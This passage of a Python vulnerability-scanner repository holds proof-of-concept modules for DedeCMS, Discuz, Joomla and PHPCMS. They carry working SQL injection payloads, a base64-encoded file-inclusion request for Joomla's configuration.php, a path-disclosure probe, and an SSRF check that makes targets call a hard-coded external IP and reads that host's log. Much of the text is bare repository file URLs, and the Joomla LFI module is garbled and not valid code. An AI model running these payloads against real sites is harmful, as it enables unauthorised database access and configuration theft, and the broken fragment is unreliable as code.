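        """Send the probe; return True when vulnerable, otherwise None."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23"
        vulnurl = self.url + payload
        try:
            # verify=False on purpose: the scan target often has a self-signed cert
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在dedecms_recommend_sqli漏洞", "white", "on_grey")
        except Exception:
            # was a bare except, which also swallowed Ctrl+C during a batch run
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = dedecms_recommend_sqli_BaseVerify(sys.argv[1])
    testVuln.run()


# ==== /POC_Scan/cms/dedecms/dedecms_search_typeArr_sqli.py ====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Metadata docstring kept verbatim (see note in dedecms_recommend_sqli.py).
# Translation: /plus/search.php typeArr is injectable; some WAFs block the
# probe, in which case build the exploit by hand.
'''
name: dedecms search.php SQL注入漏洞
referer: http://0daysec.blog.51cto.com/9327043/1571372
author: Lucifer
description: dedecms /plus/search.php typeArr存在SQL注入,由于有的waf会拦截自行构造EXP。
'''
import sys
import requests
import warnings
from termcolor import cprint


class dedecms_search_typeArr_sqli_BaseVerify:
    """DedeCMS /plus/search.php ``typeArr`` SQL injection check.

    Sends ``typeArr[ uNion ]=a`` and treats a response containing both
    ``Error infos`` and ``Error sql`` (the DedeCMS SQL error page) as
    confirmation.  Error-based only: nothing is read from the database.
    """

    def __init__(self, url):
        self.url = url  # base URL of the target, without trailing slash

    def run(self):
        """Send the probe; return True when vulnerable, otherwise None."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a"
        vulnurl = self.url + payload
        try:
            # verify=False on purpose: the scan target often has a self-signed cert
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"Error infos" in req.text and r"Error sql" in req.text:
                cprint("[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在dedecms_search_typeArr_sqli漏洞", "white", "on_grey")
        except Exception:
            # was a bare except, which also swallowed Ctrl+C during a batch run
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = dedecms_search_typeArr_sqli_BaseVerify(sys.argv[1])
    testVuln.run()


# ==== /POC_Scan/cms/dedecms/dedecms_version.py ====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Metadata docstring kept verbatim.  NOTE(review): its `description` line is a
# copy-paste from an eYou mail weak-password POC and does not describe this
# module; what the code does is read /data/admin/ver.txt and map the build
# timestamp to a DedeCMS release.
'''
name: dedecms版本探测
referer: unknow
author: Lucifer
description: 亿邮邮件系统存在弱口令账户信息泄露,导致非法登录
'''
import bisect
import re
import sys
import requests
import warnings
from termcolor import cprint

# DedeCMS build timestamp (content of /data/admin/ver.txt) -> release label
_VER_HISTORY = {'20080307': 'v3 or v4 or v5',
                '20080324': 'v5 above',
                '20080807': '5.1 or 5.2',
                '20081009': 'v5.1sp',
                '20081218': '5.1sp',
                '20090810': '5.5',
                '20090912': '5.5',
                '20100803': '5.6',
                '20101021': '5.3',
                '20111111': 'v5.7 or v5.6 or v5.5',
                '20111205': '5.7.18',
                '20111209': '5.6',
                '20120430': '5.7SP or 5.7 or 5.6',
                '20120621': '5.7SP1 or 5.7 or 5.6',
                '20120709': '5.6',
                '20121030': '5.7SP1 or 5.7',
                '20121107': '5.7',
                '20130608': 'V5.6-Final',
                '20130922': 'V5.7SP1'}
_VER_KEYS = sorted(_VER_HISTORY)  # YYYYMMDD strings sort chronologically


class dedecms_version_BaseVerify:
    """Disclose the DedeCMS build timestamp via /data/admin/ver.txt."""

    def __init__(self, url):
        self.url = url  # base URL of the target, without trailing slash

    def check_ver(self, arg):
        """Map a ``ver.txt`` timestamp string to the closest known release.

        Returns the label of the newest known build whose timestamp is <=
        ``arg``, or ``'unknown'`` when ``arg`` predates every known build.

        The original appended ``arg`` to the key list, sorted, and took the
        element *before* it: an exact match therefore reported the previous
        release, and a timestamp older than all keys indexed ``-1`` and raised
        ``KeyError`` (swallowed by ``run`` as "may not be vulnerable").
        """
        idx = bisect.bisect_right(_VER_KEYS, arg) - 1
        if idx < 0:
            return 'unknown'
        return _VER_HISTORY[_VER_KEYS[idx]]

    def run(self):
        """Fetch ver.txt; return True when it holds a bare timestamp."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/data/admin/ver.txt"
        vulnurl = self.url + payload
        try:
            # verify=False on purpose: the scan target often has a self-signed cert
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # the file is expected to contain only the digits of the build date
            m = re.search(r"^(\d+)$", req.text)
            if m:
                cprint("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s"%(m.group(1), self.check_ver(m.group(1))), "green")
                return True
            else:
                cprint("[-]不存在dedecms_version漏洞", "white", "on_grey")
        except Exception:
            # was a bare except, which also swallowed Ctrl+C during a batch run
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = dedecms_version_BaseVerify(sys.argv[1])
    testVuln.run()

# ==== /POC_Scan/cms/discuz/__init__.py ====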
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_focus_flashxss.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-37.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_forum_message_ssrf.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_plugin_ques_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-38.pyc: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/discuz/__pycache__/discuz_x25_path_disclosure.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_focus_flashxss.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: discuz X3 focus.swf flash XSS vulnerability
referer: unknown
author: Lucifer
description: focus.swf shipped with the files contains a flash XSS.
'''
import sys
import urllib
import hashlib
import requests
import warnings
from termcolor import cprint

class discuz_focus_flashxss_BaseVerify:
    """Fingerprint /static/image/common/focus.swf by MD5.

    ``run()`` downloads the file and returns ``True`` when its digest equals
    the stored constant ``flash_md5`` (presumably the digest of the affected
    build of focus.swf — not verifiable from this file), ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the file path verbatim.
        self.url = url

    def run(self):
        """Download focus.swf with urllib and compare its MD5 to ``flash_md5``."""
        # NOTE: headers is built but never sent — urlopen() below is called
        # without it, so the User-Agent string has no effect in this check.
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        flash_md5 = "c16a7c6143f098472e52dd13de85527f"
        payload = "/static/image/common/focus.swf"
        vulnurl = self.url + payload
        try:
            # Only `import urllib` is present; `urllib.request` resolves here
            # only if another import (likely `requests`) already loaded that
            # submodule. No timeout is set on this call, unlike the requests
            # calls elsewhere in the project.
            req = urllib.request.urlopen(vulnurl)
            data = req.read()
            md5_value = hashlib.md5(data).hexdigest()
            # Substring containment between two 32-hex strings; equivalent to
            # equality here, but `==` would state the intent.
            if md5_value in flash_md5:
                cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在discuz_focus_flashxss漏洞", "white", "on_grey")

        # Bare except: HTTP errors (e.g. 404 raised by urlopen) and network
        # failures are all reported as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = discuz_focus_flashxss_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_forum_message_ssrf.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: discuz forum forum.php "message" parameter SSRF vulnerability
referer: unknown
author: Lucifer
description: trs infogate plugin blind XML entity injection.
'''
# NOTE(review): the description line does not match the check (name and code
# are about the forum.php downremoteimg SSRF); it looks copy-pasted.
import sys
import time
import hashlib
import datetime
import requests
import warnings
from termcolor import cprint

class discuz_forum_message_ssrf_BaseVerify:
    """Out-of-band SSRF check for forum.php?mod=ajax&action=downremoteimg.

    The probe asks the target to fetch an image URL on a fixed external host
    (``45.76.158.91``), waits six seconds, then reads ``/web.log`` from that
    same host and looks for the per-run token. Operational caveats that follow
    directly from the code:
    - the verdict depends on a third-party host the operator does not control;
      if it is down or its log format changed, every target reads as negative;
    - running the check tells that host a scan is in progress (the token is
      requested from it), and if the target does fetch the URL the target's
      egress address reaches that host as well.
    ``run()`` returns ``True`` on a positive match, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Trigger the remote-image fetch, then poll the external log for the token."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        }
        # Per-run token: MD5 of the current epoch time (float rendered as str),
        # used as the image filename so the log line can be attributed to this run.
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
        # formhash is a fixed value; presumably a form token the endpoint expects —
        # whether a static value is accepted depends on the target, not on this code.
        payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/"+md5_str+".jpg[/img]&formhash=09cec465"
        vulnurl = self.url + payload
        try:
            # `req` is never inspected; the target's own response is irrelevant
            # to the verdict. verify=False disables TLS validation.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            eye_url = "http://45.76.158.91/web.log"
            # Fixed wait for the target's fetch to land in the external log.
            time.sleep(6)
            reqr = requests.get(eye_url, timeout=10, verify=False)
            if md5_str in reqr.text:
                cprint("[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
                return True
            else:
                cprint("[-]不存在discuz_forum_message_ssrf漏洞", "white", "on_grey")

        # Bare except: a failure reaching either host prints "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = discuz_forum_message_ssrf_BaseVerify(sys.argv[1])
    testVuln.run()

--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_plugin_ques_sqli.py:
--------------------------------------------------------------------------------

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: discuz questionnaire plugin "orderby" parameter injection vulnerability
referer: http://0day5.com/archives/3184/
author: Lucifer
description: In plugin.php the orderby parameter is SQL-injectable.
'''
# NOTE(review): the file starts with a blank line, so the shebang on line 2 is
# not honoured when the script is executed directly.
import sys
import requests
import warnings
from termcolor import cprint

class discuz_plugin_ques_sqli_BaseVerify:
    """Error-based check for the nds_up_ques plugin orderby SQL injection.

    ``run()`` issues one GET and returns ``True`` when the MD5 marker appears
    in the response, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Send the probe and look for the md5(1234) marker in the body.

        The literal compared below is 31 of the digest's 32 hex characters;
        as a substring test it still matches the full digest.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在discuz_plugin_ques_sqli漏洞", "white", "on_grey")

        # Bare except: network errors are printed as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = discuz_plugin_ques_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/discuz/discuz_x25_path_disclosure.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: discuz! X2.5 physical path disclosure vulnerability
referer: http://www.uedbox.com/discuzx25-explosive-path/
author: Lucifer
description: A PHP error message discloses the filesystem path.
'''
import re
import sys
import requests
import warnings
from termcolor import cprint

class discuz_x25_path_disclosure_BaseVerify:
    """Request three PHP files directly and look for a "Fatal error ... in <path> on line N" message.

    ``run()`` returns ``True`` at the first path that yields such an error
    (the captured filesystem path is printed), ``None`` if none does.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends each candidate path verbatim.
        self.url = url

    def run(self):
        """Try each candidate path in order; stop at the first disclosure."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payloads = ["/uc_server/control/admin/db.php",
                    "/source/plugin/myrepeats/table/table_myrepeats.php",
                    "/install/include/install_lang.php"]
        try:
            for payload in payloads:
                vulnurl = self.url + payload
                # verify=False disables TLS certificate validation for this request.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                # Non-raw pattern: "\d" is an invalid escape kept with a warning.
                # Group 1 is the path, group 2 the line number (unused).
                pattern = re.search('Fatal error.* in ([^<]+) on line (\d+)', req.text)
                if pattern:
                    cprint("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: "+vulnurl+"\tGet物理路径: "+pattern.group(1), "green")
                    return True
                else:
                    # Printed once per non-matching path, so up to three negatives per run.
                    cprint("[-]不存在discuz_x25_path_disclosure漏洞", "white", "on_grey")

        # Bare except: a failure on any one path aborts the remaining paths.
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = discuz_x25_path_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_com_docman_lfi.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/joomla/__pycache__/joomla_index_list_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/joomla_com_docman_lfi.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: joomla com_docman component local file inclusion
referer: https://www.exploit-db.com/exploits/37620
author: Lucifer
description: In the joomla component com_docman, the file parameter of com_docman/dl2.php is base64-decoded and can lead to file inclusion.
'''
import sys
import requests
import warnings
from termcolor import cprint

class joomla_com_docman_lfi_BaseVerify:
    """Check com_docman/dl2.php for local file inclusion.

    ``run()`` issues one GET whose ``file`` parameter is a base64 value
    (it decodes to ``../configuration.php``) and inspects the response.
    Returns ``True`` on a positive match, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Request dl2.php with the encoded file name and test the response."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA="
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): the page rendering lost original lines 27-33 here
            # (everything between the marker literal starting with "<" and the
            # bare except handler); the line below is the surviving fragment
            # and is not valid Python as rendered.
            if req.status_code == 200 and r"可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = joomla_com_docman_lfi_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/joomla/joomla_index_list_sqli.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: joomla 3.7.0 core SQL injection
referer: https://www.08sec.com/bobao/15167.html
author: Lucifer
description: joomla! 3.7.0 introduced a new component "com_fields" that anyone can reach without logging in; insufficient filtering of request data leads to SQL injection.
'''
import sys
import requests
import warnings
from termcolor import cprint

class joomla_index_list_sqli_BaseVerify:
    """Error-based check for the Joomla 3.7.0 com_fields list[fullordering] SQL injection.

    ``run()`` issues one GET and returns ``True`` when the MD5 marker appears
    in the response, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Send the probe and look for the md5(1234) marker in the body.

        The literal compared below is 31 of the digest's 32 hex characters;
        as a substring test it still matches the full digest.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                cprint("[+]存在joomla 3.7.0 core SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在joomla_index_list_sqli漏洞", "white", "on_grey")

        # Bare except: network errors are printed as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = joomla_index_list_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-38.pyc:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_authkey_disclosure.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_digg_add_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-37.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_flash_upload_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_product_code_exec.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-38.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v961_fileread.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v96_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-38.pyc: 